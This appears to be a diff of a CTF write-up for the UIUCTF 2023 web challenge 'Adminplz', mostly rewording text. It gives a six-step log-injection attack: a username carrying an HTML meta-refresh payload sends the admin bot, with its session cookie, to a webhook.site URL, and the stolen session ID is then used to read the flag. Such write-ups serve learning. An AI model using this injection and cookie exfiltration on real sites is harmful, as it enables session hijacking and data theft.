christiancioffi/CTF_Write-ups/UIUCTF_2023/WEB/Adminplz/README.md

 '></head> ....
 ```
-This HTML could redirect the client to the specified url including all the log's content written before the single quote in the <code>exf</code> parameter.
-If server logs an admin event inside this content, thus before injecting the <code>'>\</head\></code> part, we can exfiltrate admin's authentication cookie.
+This HTML code could redirect the client to the specified URL, including in the <code>exf</code> parameter all the content written before the single quote.
+If the server logs an admin event within this content, before injecting the <code>'>\</head\></code> part, we can exfiltrate the admin authentication cookie.

 ## Attack
 Six steps:
 + Login with username <code><html><head><meta http-equiv="refresh" content='0; url=https://webhook.site/a2e16dd2-9690-4246-8c58-abf303c42a4b?exf=</code>.
-+ Visit <code>https://instance_server/admin?view=file:///flag.html</code> (it's important that the <code>view</code> parameter contains a valid path (existent file),
-because otherwise an error will be triggered and the log's content resetted, deleting our previous input).
++ Visit <code>https://instance_server/admin?view=file:///flag.html</code> (it is important that the <code>view</code> parameter contains a valid path (existing file), otherwise an error will be raised and the content of the log will be restored, erasing our previous input).
 + Submit the url <code>https://127.0.0.1:8080/admin?view=file:///flag.html</code> to the admin bot.
 + Login with username <code><html>'>\</head\></code>.
 + Visit <code>https://instance_server/admin?view=file:///flag.html</code>.
 + Submit the url <code>http://127.0.0.1:8080/admin?view=file:///var/log/adminplz/latest.log</code> to the admin bot.

-After executing these steps, our server will receive a GET request with all the exfiltrated content inside a query parameter.
+After performing these steps, our server will receive a GET request with all exfiltrated content within a query parameter.

 ![adminplz_cookie](https://github.com/H31s3n-b3rg/CTF_Write-ups/assets/66698256/de9a0540-c05e-4747-9917-06997257a46a)

-Got admin's session ID (<code>36D142A1763851F1DE47DEB881FC2A3A</code>)!
+We got admin's session ID (<code>36D142A1763851F1DE47DEB881FC2A3A</code>)!
-Now we have to use this cookie when accessing the <code>/admin</code> endpoint.
-In order to access the flag file we have to set the <code>view</code>
+We now need to use this cookie when accessing the <code>/admin</code> endpoint.
+To access the flag file we need to set the <code>view</code>
-parameter to <code>file:///flag.html.</code>, so: <code>https://instance_server/admin?view=file:///flag.html</code>.
-By visiting this link we'll get the flag!
+parameter to <code>file:///flag.html.</code>, then: <code>https://instance_server/admin?view=file:///flag.html</code>.
+By visiting this link we will get the flag!

 ![adminplz_flag](https://github.com/H31s3n-b3rg/CTF_Write-ups/assets/66698256/888aa3a9-0937-4f36-b173-8a7777136c59)